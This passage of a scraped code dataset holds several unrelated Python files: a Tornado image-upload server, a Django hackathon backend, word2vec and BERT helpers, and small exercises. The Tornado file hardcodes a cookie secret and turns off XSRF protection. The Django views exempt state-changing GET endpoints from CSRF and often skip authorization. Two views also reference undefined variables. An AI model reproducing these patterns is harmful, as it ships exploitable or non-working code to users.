print(get_schedule('today'))\n","sub_path":"db_tutorial/mybots/vk_bot/schedule/pars_schedule.py","file_name":"pars_schedule.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"464106710","text":"import tornado.ioloop\nimport tornado.web\nimport os\nimport base64\nimport face_detect\nimport pic_pretreatment\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"main.html\")\n\nclass UpLoadHandler(tornado.web.RequestHandler):\n def post(self):\n # get and save original picture\n data = self.get_argument(\"data\")\n picData = base64.b64decode(data)\n pic_file = open(\"static/original.jpg\", \"w\")\n pic_file.write(picData)\n pic_file.close()\n # face detection\n region = face_detect.process(\"static/original.jpg\", \"static/detected.jpg\")\n # pretreatment\n pic_pretreatment.process(region, \n grayfile = \"static/gray.jpg\", \n smoothfile = \"static/smooth.jpg\",\n equfile = \"static/equ.jpg\",\n )\n self.write(\"uploadok\")\n\n\nclass PicProcessHandler(tornado.web.RequestHandler):\n def get(self):\n self.render(\"picprocess.html\", \n original = \"static/original.jpg\", \n detected = \"static/detected.jpg\", \n gray = \"static/gray.jpg\", \n smooth = \"static/smooth.jpg\",\n equ = \"static/equ.jpg\",\n )\n\n\nsettings = {\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"cookie_secret\": \"61oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=\",\n \"login_url\": \"/login\",\n \"xsrf_cookies\": False,\n}\n\napplication = tornado.web.Application([\n (r\"/\", MainHandler),\n (r\"/upload\", UpLoadHandler),\n (r\"/picprocess\", PicProcessHandler),\n (r\"/(favicon\\.ico)\", tornado.web.StaticFileHandler, dict(path=settings['static_path'])),\n], debug = True, **settings)\n\nif __name__ == \"__main__\":\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"538600672","text":"#!/usr/bin/env python\n\n#function overwrites \"student_answer.py\" file using the 2 passed command line arguments\ndef write_to_py(students_code, test_case):\n f = open('/afs/cad.njit.edu/u/r/l/rl265/public_html/php/student_answer.py', 'w') #opens \"student_answer.py\" to be written to\n f.write(students_code + \"\\n\" + \"print(\" + test_case + \")\") #writes the students code then runs test case in \"student_answer.py\"\n f.close()\n\nif __name__ == '__main__': #accepts arguments from php\n import sys #needed to call arguments\n write_to_py(sys.argv[1], sys.argv[2]) #calls write_to_py() with 1st and 2nd passed arguments\n","sub_path":"4-06-2018/Every File/php/overwrite.py","file_name":"overwrite.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"56381203","text":"from django.core import serializers\nfrom .models import Judge\nfrom .models import Team\nfrom collections import defaultdict\nfrom .models import Mentor\nfrom .models import Mentoring\nfrom .models import Challenge\nfrom django.shortcuts import render\n\nfrom django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nimport logging\nfrom dateutil import parser\nfrom django.contrib.auth.models import User\nfrom django.views.decorators.csrf import csrf_protect, csrf_exempt\nfrom .models import Student\nfrom .controllers import AuthenticationController as authentication\nimport json\nimport http\n\n\n@csrf_exempt\ndef get_listOf_project(request):\n user_model = request.user\n try:\n Judger_model = Judge.objects.get(user_id=user_model)\n except:\n return HttpResponse(\"O usuário logado não é um jurado, você está tentando burlar o sistema?\")\n lof_teams = Team.objects.filter(\n challenge=Judger_model.challenge,).exclude(link_project=None)\n data = lof_teams.values()\n\n return JsonResponse(list(data), safe=False)\n\n\n@csrf_exempt\ndef sendprojectlink(request):\n try:\n student_model = Student.objects.get(user_id=request.user)\n except:\n return HttpResponse(\"Usuário não é um estudante\")\n team_model = student_model.team_id\n team_model.link_project = request.GET.get(\"link\")\n\n team_model.save()\n return HttpResponse(\"OK\")\n\n\n@csrf_exempt\ndef register__old__Team(request):\n\n data = json.loads(request.body)\n try:\n team_name = data['team_name']\n desafio_id = 0 # O primeiro elemento vai ser um desafio nulo\n\n Team.objects.create(name=team_name, desafio_id=desafio_id)\n\n return JsonResponse({\n \"status\": \"OK\",\n }, safe=False)\n except:\n return JsonResponse({\n \"status\": \"failed\",\n }, safe=False)\n\n\n #authentication.registerTeam(team_name = data[\"team_name\"])\nstate = defaultdict(None)\n\n\ndef get_selections_mentor(request):\n user = request.user\n student = Student.objects.filter(user_id=user)\n student_first = student.first()\n\n if student_first is None:\n # Checando se o valor é de outro tipo\n isMentor = Mentor.objects.filter(user=user).exists()\n isJudger = Judge.objects.filter(user_id=user).exists()\n if isMentor:\n return HttpResponse(\"Usuário é um mentor\")\n elif isJudger:\n return HttpResponse(\"Usuário é um jurado\")\n\n if student_first.team_id is None:\n return HttpResponse(\"O estudante não tem um time\")\n\n mentoring_for_the_team = Mentoring.objects.filter(\n team=student_first.team_id)\n lof_mentoring_for_the_team = list(mentoring_for_the_team.values())\n\n filter_ = [x['mentor_id'] for x in lof_mentoring_for_the_team]\n for ind, id_ in enumerate(filter_):\n mentor = Mentor.objects.get(id=id_)\n lof_mentoring_for_the_team[ind][\"mentor_name\"] = mentor.user.first_name + \\\n \" \" + mentor.user.last_name\n lof_mentoring_for_the_team[ind]['data_meeting'] = lof_mentoring_for_the_team[ind]['time_meeting']\n del lof_mentoring_for_the_team[ind][\"time_meeting\"]\n\n return JsonResponse(lof_mentoring_for_the_team, safe=False)\n\n\n@csrf_exempt\ndef check_user_type(request):\n user_model = request.user\n isStudent = Student.objects.filter(user_id=user_model).exists()\n isMentor = Mentor.objects.filter(user=user_model).exists()\n isJudger = Judge.objects.filter(user_id=user_model).exists()\n\n if isStudent:\n return HttpResponse(\"Student\")\n elif isMentor:\n return HttpResponse(\"Mentor\")\n elif isJudger:\n return HttpResponse(\"Judger\")\n\n\ndef get_mentor_info(request):\n user_model = request.user\n mentor_model = Mentor.objects.get(user=user_model)\n data = dict()\n\n data['user'] = {\n 'name': user_model.first_name + \" \" + user_model.last_name\n }\n\n data['challenge'] = {\n \"id\": mentor_model.challenge.id,\n \"name\": mentor_model.challenge.name,\n \"enterprise\": mentor_model.challenge.empresa_desafiadora,\n \"description\": mentor_model.challenge.description\n }\n data['id'] = mentor_model.id\n data[\"kind\"] = \"Mentor\"\n\n return JsonResponse(data)\n\n\n@csrf_exempt\ndef get_user_info(request):\n user = request.user\n data = dict()\n user_category = Student.objects.filter(user_id=user)\n if user_category.exists():\n user_category_model = user_category.first()\n #team_id = Team.objects.filter(id = user_category_model.team_id)\n team_id = user_category_model.team_id\n\n data['user'] = {\n 'name': user_category_model.user_id.first_name + \" \" + user_category_model.user_id.last_name\n }\n\n if team_id is not None:\n team_id_model = team_id\n data['team'] = {\n \"id\": team_id_model.id,\n \"challenge\": team_id_model.challenge.name,\n }\n else:\n data['team'] = None\n else:\n data['user'] = None\n user_category = Mentor.objects.filter(user=user)\n if user_category.exists():\n return get_mentor_info(request)\n\n data['kind'] = \"Student\"\n return JsonResponse(data)\n\n\n@csrf_exempt\n@login_required\ndef get_teams(request):\n judger = Judge.objects.get(user_id=request.user)\n # Apenas a equipe que contem o desafio do jurado\n teams = Team.objects.filter(challenge_id=judger.challenge_id)\n lofs = list(teams.values())\n challenges_ids = [x['challenge_id'] for x in lofs]\n challenge_list = []\n for x in challenges_ids:\n challenge_unique = Challenge.objects.get(id=x)\n challenge_list.append({\n \"id\": challenge_unique.id,\n \"name\": challenge_unique.name,\n \"challenger_enterprise\": challenge_unique.empresa_desafiadora\n })\n\n for ind, val in enumerate(lofs):\n lofs[ind]['challenge_id'] = challenge_list[ind]\n temp = lofs\n # Retornando os dados no estilo json\n json_format = JsonResponse(temp, safe=False)\n return json_format\n\n\n@csrf_exempt\ndef set_points(request):\n # Receber o juiz\n judger = Judge.objects.get(user_id=request.user)\n # Realizar a inserção da nota\n # Obter o team_id que será enviado pelo sistema\n team_id = request.GET.get(\"team_id\")\n noteJudger = request.GET.get(\"note\")\n team = Team.objects.get(id=int(team_id))\n team.judger_assign = judger\n team.noteJudger = float(noteJudger)\n team.save()\n\n return HttpResponse(\"OK\")\n\n\ndef select_mentor(request):\n \"\"\"\n Esta função já partirá do princípio que a lista dos mentores assim como seu identificado já foi enviado para o front-end, logo o front-end apenas irá realizar uma requisição\n dado o id e o nome do mentor junto com a data da mentoria disponível.\n \"\"\"\n\n # obtendo os dados\n user = request.user\n mentor_name = request.GET.get('mentor_name')\n mentor_id = request.GET.get('mentor_id')\n meeting_data = request.GET.get('data_meeting') # str\n student = Student.objects.get(user_id=request.user)\n team = student.team_id\n\n # Verificar se a mentoria já foi selecionada.\n data_info_formated = parser.parse(meeting_data)\n mentor_model = Mentor.objects.get(id=mentor_id)\n\n try:\n # Captura todas as mentorias disponíveis do mentor\n mentoring_model = Mentoring.objects.get(\n mentor=mentor_model, team=None, time_meeting=data_info_formated)\n except:\n return HttpResponse(\"Mentoria não encontrada\")\n mentoring_model.team = team\n mentoring_model.save()\n return HttpResponse(\"Mentoria registrada!\")\n\n # Inserindo a nova mentoria\n\n newMentoring = Mentoring(mentor=mentor_model,\n team=team, time_meeting=data_info_formated)\n\n newMentoring.save()\n return HttpResponse(\"Meeting made\")\n # return JsonResponse(data, safe = False)\n\n\n@csrf_exempt\ndef show_disposable_mentors(request):\n \"\"\"\n Esta função fará a seleção dos mentores disponível para então mostrar para o usuário\n \"\"\"\n\n # Precisamos checar se a mentorias selecionada faz parte do setor de interesse do usuário.\n user_model = request.user\n team_model = Student.objects.get(user_id=user_model).team_id\n\n if team_model is None:\n return HttpResponse(\"O usuário inserido não possui um time\")\n #challenge_id = mentorias_model.mentor_id.challenge_id\n\n mentorias_model = Mentoring.objects.filter(\n mentor_id__challenge_id=team_model.challenge_id\n ) # filtrando apenas as mentorias que estão livres\n #disposable_meetings = mentorias_model.filter(mentor_id__challenge_id = team_model.challenge_id)\n #values = list(disposable_meetings.objects.values())\n\n # mentor_info = mentorias_model.\n values = list(mentorias_model.values())\n filter_ = [v['mentor_id'] for v in values]\n\n for ind, v in enumerate(filter_):\n first_name = Mentor.objects.get(id=v).user.first_name\n last_name = Mentor.objects.get(id=v).user.last_name\n values[ind][\"name\"] = f\"{first_name} {last_name}\"\n #response = Mentor.objects.get(id__in = filter_)\n\n #mentor_filter = Mentor.objects.filter(id__in = filter_).get(\"user_id\")\n\n # return HttpResponse(\"OK\")\n return JsonResponse(values, safe=False)\n\n\ndef insert_data_meeting(request):\n \"\"\"\n Função que fará a inserção dos horário de mentoria\n \"\"\"\n user_model = request.user # usuário precisa ser um mentor\n meeting_hour = request.GET.get('meeting_hour')\n try:\n mentor_model = Mentor.objects.get(user=user_model)\n except:\n return HttpResponse(\"Usuário não é um mentor\")\n from datetime import datetime\n #datetime_formated = datetime.strptime(date = meeting_hour,format = \"%d/%m/%Y %H:%M:%S\")\n datetime_formated = parser.parse(meeting_hour)\n time_meeting = datetime_formated\n Mentoring.objects.create(\n mentor=mentor_model, team=None, time_meeting=time_meeting)\n\n return HttpResponse(\"WORK!\")\n\n\n@csrf_exempt\ndef integrate_team(request):\n user_model = request.user\n # Ger Json data {\"Team\" : [\"e-mail1\",\"e-mail2\"]}\n data = json.loads(request.body)\n emails = data['email']\n student_model = Student.objects.get(user_id=user_model)\n team_model = student_model.team_id\n lof_status = []\n\n #anothers_user_models = User.objects.filter(email__in = emails)\n\n #students_user_models = Student.objects.filter(user_id__in = anothers_user_models)\n\n #students_user_models_without_team = students_user_models.filter(team_id = None)\n\n # students_user_models_with_team = students_user_models.exclude(team_id = None) # Finalizar esta parte para retornar as pessoas que não foram inseridas na equipe\n #students_user_models_without_team.update(team_id = team_model)\n\n for email in emails:\n # try:\n\n another_user_model = User.objects.get(email=email)\n\n another_student_model = Student.objects.get(user_id=another_user_model)\n\n another_student_model.team_id = team_model\n another_student_model.save()\n\n lof_status.append({\n \"name\": another_user_model.first_name + \" \" + another_user_model.last_name,\n \"status\": \"integrated\"\n })\n\n resposta = JsonResponse(lof_status, safe=False)\n #resposta[\"Access-Control-Allow_Origin\"] = \"*\"\n #resposta[\"Access-Control-Allow_Methods\"] = ['GET','POST','OPTION']\n #resposta[\"Access-Control-Allow_Headers\"] = \"*\"\n\n return resposta\n\n\n@csrf_exempt\ndef getout_team(request):\n user_model = request.user\n student_model = Student.objects.get(user_id=user_model)\n\n if student_model.isLeader:\n QueryStudentSet = Student.objects.filter(team_id=student_model.team_id)\n QueryStudentSet.team_id = None\n student_model.team_id.delete()\n\n student_model.team_id = None\n student_model.save()\n return HttpResponse(\"OK\")\n\n\n@csrf_exempt\ndef create_team(request):\n \"\"\"\n Quando o time é criado, automaticamente este está associado a um desafio\n \"\"\"\n\n user_model = request.user\n challenge_name = request.GET.get(\"challenge\")\n try:\n challenge_model = Challenge.objects.get(name=challenge_name)\n except:\n return JsonResponse({\n \"status\": \"challenge canno't be found\"\n })\n\n student_model = Student.objects.get(user_id=user_model)\n team_model = Team.objects.create(challenge_id=challenge_model.id)\n student_model.team_id = team_model\n student_model.save()\n\n return JsonResponse({\n \"status\": \"OK\"\n })\n\n\ndef create_challenge(request):\n # No momento a criação dos desafios seá feita diretamente na página do administrador\n\n challenge_name = request.GET.get(\"challenge\")\n check_exists = Challenge.objects.filter(name=challenge_name)\n\n if len(check_exists):\n return JsonResponse({\n 'status': 'challenge already exist'\n })\n else:\n\n challenge_model = Challenge.objects.create(name=challenge_name)\n return JsonResponse({\n \"status\": \"ok\"\n })\n\n\n@csrf_exempt\ndef loginUser(request):\n\n username = request.GET.get('username')\n logout(request)\n login_field = login(request, user_authentication,)\n\n if username is not None:\n return JsonResponse({\n \"status\": \"ok\",\n })\n else:\n return JsonResponse({\n })\n\n\n@csrf_exempt\ndef register(request):\n username = request.GET.get('username')\n email = request.GET.get('email')\n first_name = request.GET.get('first_name')\n last_name = request.GET.get('last_name')\n category = request.GET.get('category')\n # será o id do desafio pois na tela de login o jurado recebera o id do desafio\n challenge_id = request.GET.get('challenge')\n challenge = challenge_id\n check_user = User.objects.filter(email=email)\n\n # O usuário já existe?\n if len(check_user):\n # login(request,usuario)\n return JsonResponse({\n 'status': 'User already exist',\n }, safe=False)\n else:\n user_model.first_name = first_name\n user_model.last_name = last_name\n user_model.save()\n\n if category == 'student':\n student_model = Student.objects.create(\n user_id=user_model, team_id=None, isLeader=False)\n elif category == 'judger':\n challenge = Challenge.objects.get(id=challenge_id)\n jugder_mode = Judge.objects.create(\n user_id=user_model, challenge=challenge)\n\n elif category == 'mentor':\n # mentor_model = Mentor.objects.create(user = user_model, challenge)\n challenge = Challenge.objects.get(id=challenge_id)\n mentor_model = Mentor.objects.create(\n user=user_model, challenge=challenge)\n\n return JsonResponse({\n 'status': 'created'\n }, safe=False)\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"441836235","text":"def get_coach_data(filename):\n try:\n with open(filename) as f:\n data = f.readline()\n List = data.strip().split(\",\")\n dic = {}\n dic[\"Name\"] = List.pop(0)\n dic[\"Dob\"] = List.pop(0)\n dic[\"Times\"] = str(sorted(set(sanitize(t) for t in List))[0:3])\n return dic\n except IOError as error:\n print(\"File error\" + str(error))\n return (None)\n\ndef sanitize(item):\n if '-' in item:\n spliter = \"-\"\n elif ':' in item:\n spliter = \":\"\n else:\n return item\n (first, second) = item.split(spliter)\n return (first + \".\" + second)\n\nsarah = get_coach_data(\"sarah2.txt\")\nprint (sarah[\"Name\"] + \"'s fastest time are: \" + sarah[\"Times\"])\n","sub_path":"Head-First Python/Chapter-6/function5.py","file_name":"function5.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"137085731","text":"# Given an array A of strings made only from lowercase letters, return a list of all characters that show up in all strings within the list (including duplicates). For example, if a character occurs 3 times in all strings but not 4 times, you need to include that character three times in the final answer.\n\n# You may return the answer in any order.\n\n \n\n# Example 1:\n\n# Input: [\"bella\",\"label\",\"roller\"]\n# Output: [\"e\",\"l\",\"l\"]\n# Example 2:\n\n# Input: [\"cool\",\"lock\",\"cook\"]\n# Output: [\"c\",\"o\"]\n\nclass Solution:\n def commonChars(self, A: List[str]) -> List[str]:\n chr_cnt = self.cntChrs(A[0]) \n for w in A:\n new_cnt = {}\n curr_cnt = self.cntChrs(w)\n for c, cnt in curr_cnt.items():\n if c in chr_cnt: \n new_cnt[c] = min(cnt, chr_cnt[c]) \n chr_cnt = new_cnt \n res = [] \n for c, cnt in chr_cnt.items():\n if cnt == 1: \n res.append(c)\n else:\n for _ in range(cnt):\n res.append(c)\n return res \n\n def cntChrs(self, w: str) -> dict: \n d = {}\n for c in w: \n if c not in d:\n d[c] = 0\n d[c] += 1 \n return d\n","sub_path":"dailyProb/prob1002.py","file_name":"prob1002.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"45777154","text":"from typing import Dict\n\nfrom models.test_suite_models.test_suite import TestSuite\n\n\nclass TraceStatistics:\n def __init__(self, test_suite: TestSuite):\n self.ground_truth_cardinality = len(test_suite.logic_methods_faulty)\n self.ground_truth_mid_to_trace_count = test_suite.get_trace_count_for_ground_truth()\n self.ground_truth_trace_count = sum(self.ground_truth_mid_to_trace_count.values())\n self.total_test_methods = len(test_suite.test_methods)\n\n def gen_value_maps(self):\n value_map = {\n 'Ground Truth Total Trace Count': self.ground_truth_trace_count,\n 'Ground Truth Average Trace Count': self.ground_truth_trace_count / len(self.ground_truth_mid_to_trace_count),\n 'Ground Truth Traces Per Method': ','.join(str(v) for v in self.ground_truth_mid_to_trace_count.values()),\n 'Total Number of Tests': self.total_test_methods,\n # 'Total Tests hitting faulty components': ,\n # 'Average Tests hitting faulty components': ,\n }\n return value_map\n","sub_path":"models/test_suite_models/trace_statistics.py","file_name":"trace_statistics.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"331746640","text":"from rng import RNG\n\nclass Trace:\n def __init__(self):\n self.vars = {}\n self.vars_frozen = {}\n self.isOutputFrozen = False\n self.isAllFrozen = False\n self.isNoneFrozen = True\n def __call__(self, *args):\n name = args[0]\n if self.isNoneFrozen:\n if name in self.vars:\n return self.vars[name].getValue()\n else:\n return RNG(name,self)\n elif self.isAllFrozen:\n if name in self.vars_frozen:\n return self.vars[name].getValue()\n else:\n self.vars_frozen[name] = \"\"\n return RNG(name,self,False)\n elif self.isOutputFrozen:\n if name in self.vars_frozen:\n return self.vars[name].getValue()\n elif not self.vars[name].isOutput:\n self.vars_frozen[name] = \"\"\n return RNG(name,self)\n else:\n self.vars_frozen[name] = \"\"\n return RNG(name,self,False)\n else:\n raise\n\n def density(self):\n return reduce(lambda x,y:x*y, [self.vars[x].density() for x in self.vars], 1)\n def get_latent_densities(self):\n return [(x, self.vars[x].density()) for x in self.vars if not self.vars[x].isOutput]\n def get_output_densities(self):\n return [(x, self.vars[x].density()) for x in self.vars if self.vars[x].isOutput]\n def get_latent_values(self):\n return [(x, self.vars[x].getValue()) for x in self.vars if not self.vars[x].isOutput]\n def get_output_values(self):\n return [(x, self.vars[x].getValue()) for x in self.vars if self.vars[x].isOutput]\n\n def tag_random_outputs(self, names):\n for name in names:\n if name not in self.vars:\n raise\n else:\n self.vars[name].isOutput = True\n def freeze_all(self):\n self.vars_frozen = {}\n self.isOutputFrozen = False\n self.isAllFrozen = True\n self.isNoneFrozen = False\n def freeze_output(self):\n self.vars_frozen = {}\n self.isOutputFrozen = True\n self.isAllFrozen = False\n self.isNoneFrozen = False\n def freeze_none(self):\n self.vars_frozen = {}\n self.isOutputFrozen = False\n self.isAllFrozen = False\n self.isNoneFrozen = True\n","sub_path":"code/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"215916615","text":"#\n# Dependencies:\n# RemoveExtraWhitespace\n#\n\nfrom norlinter.rule import SingleLineRule\n\nMEMORY = [\"copy\", \"strong\", \"weak\", \"assign\"]\nACCESS = [\"readwrite\", \"readonly\"]\n\nclass FixProperties (SingleLineRule):\n def format(self, line):\n formatted = line.strip()\n if not formatted.startswith(\"@property\"): return line\n # Doesn't have attributes\n if formatted.replace(\" \", \"\")[9] != \"(\":\n return \"{};\".format(formatted.strip(\"; \"))\n start = formatted.find(\"(\") # Already checked w/ previous condition\n end = formatted.find(\")\", start)\n assert end != -1, \"property is not properly defined\"\n attributes = formatted[start+1:end]\n attributes = attributes.replace(\" \", \"\").split(\",\")\n ordered = []\n # nonatomic is always first\n if \"nonatomic\" in attributes[:]:\n ordered.append(\"nonatomic\")\n attributes.remove(\"nonatomic\")\n # Put memory first\n for attribute in attributes[:]:\n if attribute in MEMORY:\n ordered.append(attribute)\n attributes.remove(attribute)\n # Access restrictions second\n for attribute in attributes[:]:\n if attribute in ACCESS:\n ordered.append(attribute)\n attributes.remove(attribute)\n # Everything else is last\n for attribute in attributes[:]:\n ordered.append(attribute)\n return \"@property ({}) {};\".format(\", \".join(ordered), formatted[end+1:].strip(\"; \"))\n\n def getErrorDescription(self):\n return \"Invalid formatted property declaration\"\n","sub_path":"norlinter/source/norlinter/rule/FixProperties.py","file_name":"FixProperties.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"164151915","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 2 13:09:20 2017\n\n@author: 凯风\n\"\"\"\n\nfrom gensim.models import Word2Vec\nimport jieba,logging\nimport nltk\nimport numpy as np \nimport pandas as pd \n\n'''\n 通过深度学习,将生成每个词的向量。\n 具体的研究看论文或blog吧\n https://segmentfault.com/a/1190000008173404\n 这是一篇关于官网给出的教程的翻译,感觉还不错\n'''\n\n\n# 日志配置\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n# 读取数据\nfilename = 'C:/Users/dell/Desktop/金瓶梅.txt'\ndata = open(filename,encoding='utf-8',errors='ignore').readlines()\n\n# 特征处理\ndata = data[256:]\ndata = list(filter(lambda s : len(s) > 3 , data))\ndata = list(map(lambda s : s.strip() , data))\nwords = map(lambda s : list(jieba.cut(s)) , data)\nall_words = []\nfor each in words:\n all_words.extend(each)\n\n# 获取停用词清单\nstopwords_english = nltk.corpus.stopwords.words('english')\nfilename = 'D:/mygit/ML_Method_summary/Text_Operation/Basic_Operation/stopword.txt'\nstopwords_chinese = [line.rstrip() for line in open(filename)]\n\n# 停词处理\nword_stoped_middle = [i for i in all_words if i not in stopwords_english]\nword_stoped = [i for i in word_stoped_middle if i not in stopwords_chinese]\n\nn = np.unique(word_stoped,return_counts=True)\ns = pd.Series(data = n[1],index = n[0])\ns = s[6:]\nbook_words = s.sort_values(ascending=False)\nbook_words.values\nbook_words.index\n\n# 出现的词大于100次,且为长度大于1的\nbook_words[book_words > 200]\n\n# word2vec\n# 这里最好传入的是迭代器,不要传入其他类型的数据结构,会训练速度\nmodel = Word2Vec(word_stoped)\nmodel['西']\nmodel.most_similar(positive=['西'],topn=20)\n\n\n# 还有很多方法,可以调用\n\n'''\n sentences 句子,要向量化的对象\n size 每个词的向量维数\n alpha 1 \n window 1\n min_count 忽略一些词,用于修建内部的字典\n max_vocab_size \n sample 1\n seed 1\n workers 装了Cpython有效,用于加快训练\n min_alpha 1\n sg 1\n hs 1\n negative 1\n cbow_mean 1\n iter 1\n null_word 1\n trim_rule 1\n sorted_vocab 1\n batch_words 1\n'''\n","sub_path":"Text_Operation/Basic_Operation/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"178188757","text":"# coding=utf-8\n# author=yphacker\n\nimport numpy as np\nfrom conf import config\nfrom conf import bert_model_config\nfrom utils.bert import tokenization\n\n\ndef get_bert_param_lists(texts):\n \"\"\"\n 将数据转换成Bert能够使用的格式\n input_ids:根据BERT-Base-Chinese checkpoint中的vocabtxt中每个字出现的index,将训练文本中的每一个字替换为vocab.txt中的index,需要添加开始CLS和结束SEP\n input_masks:包含开始CLS和结束SEP有字就填1\n segment_ids:seq2seq类任务同时传入两句训练关联训练数据时,有意义,传入一句训练数据则都为0\n 以上三个list需要用0补齐到max_seq_length的长度\n \"\"\"\n # token 处理器,主要作用就是 分字,将字转换成ID。vocab_file 字典文件路径\n tokenizer = tokenization.FullTokenizer(vocab_file=bert_model_config.bert_vocab_path)\n input_ids_list = []\n input_masks_list = []\n segment_ids_list = []\n for text in texts:\n single_input_id, single_input_mask, single_segment_id = \\\n convert_single_example_simple(config.max_seq_length, tokenizer, text)\n input_ids_list.append(single_input_id)\n input_masks_list.append(single_input_mask)\n segment_ids_list.append(single_segment_id)\n input_ids = np.asarray(input_ids_list, dtype=np.int32)\n input_masks = np.asarray(input_masks_list, dtype=np.int32)\n segment_ids = np.asarray(segment_ids_list, dtype=np.int32)\n return input_ids, input_masks, segment_ids\n\n\ndef bert_bacth_iter(x, y, batch_size=config.batch_size):\n input_ids, input_masks, segment_ids = x\n index = np.random.permutation(len(y))\n n_batches = len(y) // batch_size\n for batch_index in np.array_split(index, n_batches):\n batch_input_ids, batch_input_masks, batch_segment_ids, batch_y = \\\n input_ids[batch_index], input_masks[batch_index], segment_ids[batch_index], y[batch_index]\n yield (batch_input_ids, batch_input_masks, batch_segment_ids), batch_y\n\n\ndef batch_iter(x, y, batch_size=config.batch_size):\n \"\"\"生成批次数据\"\"\"\n data_len = len(x)\n num_batch = int((data_len - 1) / batch_size) + 1\n\n indices = np.random.permutation(np.arange(data_len))\n x_shuffle = x[indices]\n y_shuffle = y[indices]\n\n for i in range(num_batch):\n start_id = i * batch_size\n end_id = min((i + 1) * batch_size, data_len)\n yield x_shuffle[start_id:end_id], y_shuffle[start_id:end_id]\n\n\ndef get_sequence_length(x_batch):\n \"\"\"\n Args:\n x_batch:a batch of input_data\n Returns:\n sequence_lenghts: a list of acutal length of every senuence_data in input_data\n \"\"\"\n sequence_lengths = []\n for x in x_batch:\n actual_length = np.sum(np.sign(x))\n sequence_lengths.append(actual_length)\n return sequence_lengths\n\n\ndef export_word2vec_vectors(vocab):\n \"\"\"\n Args:\n vocab: word_to_id\n word2vec_dir:file path of have trained word vector by word2vec\n trimmed_filename:file path of changing word_vector to numpy file\n Returns:\n save vocab_vector to numpy file\n\n \"\"\"\n infile = open(config.vector_word_filename, 'r')\n voc_size, vec_dim = None, None\n embeddings = None\n for i, line in enumerate(infile):\n if i == 0:\n voc_size, vec_dim = map(int, line.split(' '))\n embeddings = np.zeros([len(vocab), vec_dim])\n continue\n items = line.split(' ')\n word = items[0]\n # vec = np.asarray(items[1:], dtype='float32')\n vec = np.asarray(items[1:])\n if word in vocab:\n word_idx = vocab[word]\n embeddings[word_idx] = np.asarray(vec)\n np.savez_compressed(config.vector_word_npz, embeddings=embeddings)\n infile.close()\n\n\ndef get_training_word2vec_vectors(filename):\n \"\"\"\n Args:\n filename:numpy file\n Returns:\n data[\"embeddings\"]: a matrix of vocab vector\n \"\"\"\n with np.load(filename) as data:\n return data[\"embeddings\"]\n\n\ndef _truncate_seq_pair(tokens_a, tokens_b, max_length):\n \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\"\n\n # This is a simple heuristic which will always truncate the longer sequence\n # one token at a time. This makes more sense than truncating an equal percent\n # of tokens from each, since if one sequence is very short then each token\n # that's truncated likely contains more information than a longer sequence.\n while True:\n total_length = len(tokens_a) + len(tokens_b)\n if total_length <= max_length:\n break\n if len(tokens_a) > len(tokens_b):\n tokens_a.pop()\n else:\n tokens_b.pop()\n\n\ndef convert_single_example_simple(max_seq_length,\n tokenizer, text_a, text_b=None):\n tokens_a = tokenizer.tokenize(text_a)\n tokens_b = None\n if text_b:\n tokens_b = tokenizer.tokenize(text_b) # 这里主要是将中文分字\n if tokens_b:\n # 如果有第二个句子,那么两个句子的总长度要小于 max_seq_length - 3\n # 因为要为句子补上[CLS], [SEP], [SEP]\n _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)\n else:\n # 如果只有一个句子,只用在前后加上[CLS], [SEP] 所以句子长度要小于 max_seq_length - 2\n if len(tokens_a) > max_seq_length - 2:\n tokens_a = tokens_a[0:(max_seq_length - 2)]\n\n # 转换成bert的输入,注意下面的type_ids 在源码中对应的是 segment_ids\n # (a) 两个句子:\n # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]\n # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1\n # (b) 单个句子:\n # tokens: [CLS] the dog is hairy . [SEP]\n # type_ids: 0 0 0 0 0 0 0\n #\n # 这里 \"type_ids\" 主要用于区分第一个第二个句子。\n # 第一个句子为0,第二个句子是1。在预训练的时候会添加到单词的的向量中,但这个不是必须的\n # 因为[SEP] 已经区分了第一个句子和第二个句子。但type_ids 会让学习变的简单\n\n tokens = []\n segment_ids = []\n tokens.append(\"[CLS]\")\n segment_ids.append(0)\n for token in tokens_a:\n tokens.append(token)\n 